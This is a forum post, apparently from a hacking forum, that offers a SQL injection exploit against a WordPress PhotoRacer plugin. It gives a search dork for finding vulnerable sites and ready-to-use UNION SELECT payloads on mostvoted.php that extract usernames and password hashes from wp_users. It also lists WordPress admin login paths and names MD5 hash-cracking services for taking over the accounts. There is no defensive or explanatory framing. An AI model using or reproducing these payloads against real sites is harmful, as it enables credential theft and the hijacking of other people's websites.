WordPress PhotoRacer Plugin(Attachment) SQL Exploit

  • Thread starter Thread starter AdminAdmin is verified member.
  • Start date Start date
Admin

AdminAdmin is verified member.

Well-Known Member
Staff member
Administrator
Dork: inurl:"mostvoted.php?pid="
Exploit: mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users
OR : Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password = mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/
MD5 Crack:
Hashchecker.de - Passwrter finden!
md5cracker.org | The Cracking Engine for MD5-Hashes
 

Facebook Comments

Similar threads

Admin
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
Admin
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
Admin
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
Admin
Replies
0
Views
3K
AdminAdmin is verified member.
Admin
blog4me
Replies
3
Views
4K
deste
D
cuongpro9x
Replies
1
Views
8K
cuongpro9xcuongpro9x is verified member.
cuongpro9x
Back
Top